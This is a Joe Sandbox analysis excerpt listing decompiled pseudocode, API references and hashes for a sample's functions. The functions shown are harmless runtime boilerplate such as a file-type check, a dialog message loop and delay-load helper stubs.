Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: e13b48070a70aae3dd87dac9b967e8d4079dc715caa04fc070f3b589795e5392
Instruction ID: d134e60808016b2272120632d269883717e079c3f0e04953e92db991e51864c6
Opcode Fuzzy Hash: e13b48070a70aae3dd87dac9b967e8d4079dc715caa04fc070f3b589795e5392
Instruction Fuzzy Hash: 2FD05E302001086BDB40AA61CC02AF976D8DB00300F0081F5BE0885160EEF2DD10A261

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9929 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA9929(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00ba992d
0x00ba9935
0x00ba993e
0x00ba994b
0x00ba9945
0x00ba9947
0x00ba9947
0x00ba992f
0x00ba9931
0x00ba9931

APIs

GetFileType.KERNELBASE(000000FF,00BA9827), ref: 00BA9935

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 799328f4659a3847d9a3ad6f5278fa0e29e54937ae07422d94ca2b0358fbeae6
Instruction ID: a7c6586b473e04081f86fc476b93d70fa2c25903920d74272ea6b9155148726e
Opcode Fuzzy Hash: 799328f4659a3847d9a3ad6f5278fa0e29e54937ae07422d94ca2b0358fbeae6
Instruction Fuzzy Hash: 17D01231015540B58F224A344D4909B6792DBC3376B38C7ECD035C90A1D722C803F542

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD270 Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBD270(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xbe7438, 0x6a, 0x402, E00BAFA2C(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00BBABC4(); // executed
				return _t7;
			}

0x00bbd295
0x00bbd29b
0x00bbd2a0

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00BBD295

Part of subcall function 00BBABC4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBABD5
Part of subcall function 00BBABC4: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBABE6
Part of subcall function 00BBABC4: IsDialogMessageW.USER32(00060384,?), ref: 00BBABFA
Part of subcall function 00BBABC4: TranslateMessage.USER32(?), ref: 00BBAC08
Part of subcall function 00BBABC4: DispatchMessageW.USER32(?), ref: 00BBAC12

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: b5eb7f97e533afc99ee2ad4bd34c1f915ef3525a400f31d115638932f6c1a09b
Instruction ID: c23d4c94a78374b1f3b0e18de4e53e613d1fd845708764ae3b6beb147d8b7dca
Opcode Fuzzy Hash: b5eb7f97e533afc99ee2ad4bd34c1f915ef3525a400f31d115638932f6c1a09b
Instruction Fuzzy Hash: 41D09E31148200BBD7112B51CE06F5EBAF7AB88B05F404594B389740F286A29E209B16

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE04F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBE04F() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae84, 0xc01034); // executed
				goto __eax;
			}

0x00bbe059
0x00bbe061
0x00bbe068

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBE061

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 567c24327467caef1bc13185cd52d295e1347abaf169834d7e1b784c205a16a9
Instruction ID: 8a37c0b4442fc5be603421a085cfdfdfb1ba2669dbebc3bfb99f0552dbbb7408
Opcode Fuzzy Hash: 567c24327467caef1bc13185cd52d295e1347abaf169834d7e1b784c205a16a9
Instruction Fuzzy Hash: D1B012D525F0417F320832605D83DF683CCC1C0B50374C1EBB650C40E0B4C54C428032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD92F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD92F() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdadc4, 0xc01050); // executed
				goto __eax;
			}

0x00bbd900
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 12148d2156ad911827ccb385649bbef7e1ad0f00aa9c4527d45aac06bc5618a2
Instruction ID: 36c9d6cf852851a3cd93126133da8d2c1d8223477a9655090a96c1be810501b2
Opcode Fuzzy Hash: 12148d2156ad911827ccb385649bbef7e1ad0f00aa9c4527d45aac06bc5618a2
Instruction Fuzzy Hash: 5DB012C52590016E334476146C06E7B41CCC0C4B11334C8FBF584C01D0F4C80C444032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD925 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD925() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdadc4, 0xc0104c); // executed
				goto __eax;
			}

0x00bbd900
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 933db1f91ef0ec4c2a958dca70481f7085a97abe7e659d422430c993522833d0
Instruction ID: 26cbb1fc12dcb89ba9cf4ce8e4d20f8adae9513a9aa1e3f55587a1ced31f0c1e
Opcode Fuzzy Hash: 933db1f91ef0ec4c2a958dca70481f7085a97abe7e659d422430c993522833d0
Instruction Fuzzy Hash: 39B012D925A001AF334472156D46D7641CCC0C4B11334C4FBB884C01D0F4CC0C404032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD957 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD957() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdadc4, 0xc01060); // executed
				goto __eax;
			}

0x00bbd900
0x00bbd908
0x00bbd90f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD908

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2488a45f0e4cdb9d2e5ec141444d236a5ff854561c7581d129785bfb45aed62d
Instruction ID: 91c67b218989d8c3e167edfd3e6a07ee41f401bc020f11295654e07d113933c4
Opcode Fuzzy Hash: 2488a45f0e4cdb9d2e5ec141444d236a5ff854561c7581d129785bfb45aed62d
Instruction Fuzzy Hash: 64B012C52991056E324472146C46E7641CCC0C4B1133484FBB484C01D0F4C80C404132

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDAB3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDAB3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae44, 0xc01170); // executed
				goto __eax;
			}

0x00bbda84
0x00bbda8c
0x00bbda93

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA8C

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 11d99acb9c8d94085a80dd02f23b626d49a4be2acccefd242f1b7bf1b9945c4e
Instruction ID: 92d1f340452c086e8483f067d1c4b846e9ebc90c9af98236d5fdd257dfe42f50
Opcode Fuzzy Hash: 11d99acb9c8d94085a80dd02f23b626d49a4be2acccefd242f1b7bf1b9945c4e
Instruction Fuzzy Hash: 99B012D136D1036F314862145C07D7A42ECC0C4B1033482EBBA00C0290F4C84C008032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDAA9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDAA9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae44, 0xc0117c); // executed
				goto __eax;
			}

0x00bbda84
0x00bbda8c
0x00bbda93

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA8C

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aa9c46b1e778c8a61c033efa442ba8763683a0e0ddc03b6b6fa23a3d09a29c3a
Instruction ID: 7cb482069c087236261e5c3200078fb39d0a5bed0b3087e990eec5a82b0d0b4a
Opcode Fuzzy Hash: aa9c46b1e778c8a61c033efa442ba8763683a0e0ddc03b6b6fa23a3d09a29c3a
Instruction Fuzzy Hash: CBB012D535D0036F314862145C07E7A42ECC1C4B10334C2EBBE00C0290F4C84C008032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA95 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA95() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae44, 0xc01174); // executed
				goto __eax;
			}

0x00bbda84
0x00bbda8c
0x00bbda93

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA8C

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4cd6831cf0ba393ff1564b728f5cccddcde5983cedd0c8d126f6e9cad89459e2
Instruction ID: a4d1586cbf8fa05022507592eca61d84431ff8b0184bf2f24eab01f935bb4b20
Opcode Fuzzy Hash: 4cd6831cf0ba393ff1564b728f5cccddcde5983cedd0c8d126f6e9cad89459e2
Instruction Fuzzy Hash: 78B012D135D0036F314862145D07DBA42ECC0C0B1033483EBBA00C0290F4C94D018032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA3E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA3E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc0108c); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40d437b15671d5a053f61d0db796db64db07555436f9c4c6372d351f38958521
Instruction ID: 5c859ce7f5181bb6d867708d4d7fc59ca433f8b112f3f6e35294e93266ef1eeb
Opcode Fuzzy Hash: 40d437b15671d5a053f61d0db796db64db07555436f9c4c6372d351f38958521
Instruction Fuzzy Hash: E2B012C526D801AF314473151D02DB682DCC0C5B10334C1FFB980C1190F8C80C448032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA34 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA34() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc01090); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e226203935566fc02b7b3245708551e1a2b600630bc6dcc9cf0d9efe3d2a18fa
Instruction ID: 9fc6e14c8f32b61caa3b1263fa902e65dfc89a561b0c1fcc723f4100fd5a0ead
Opcode Fuzzy Hash: e226203935566fc02b7b3245708551e1a2b600630bc6dcc9cf0d9efe3d2a18fa
Instruction Fuzzy Hash: 37B012D126D8016F314473251C12E7682CCC0C5B1033481FFB540C0190F4C80C448032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA19 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA19() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc01088); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a8f0e755fcdf210cf1cc0b658f809ba97195593510c8ceddedf29af951a9b97e
Instruction ID: 3aa0d5ee5f8849214f96b6eb88e8f6aacf27abf8dcea85d484f218b5aef3d9f4
Opcode Fuzzy Hash: a8f0e755fcdf210cf1cc0b658f809ba97195593510c8ceddedf29af951a9b97e
Instruction Fuzzy Hash: 96B012C226D9017F330473116C02CB6C2CCC0C5B10334C2FFB580C0090B8C80C848032

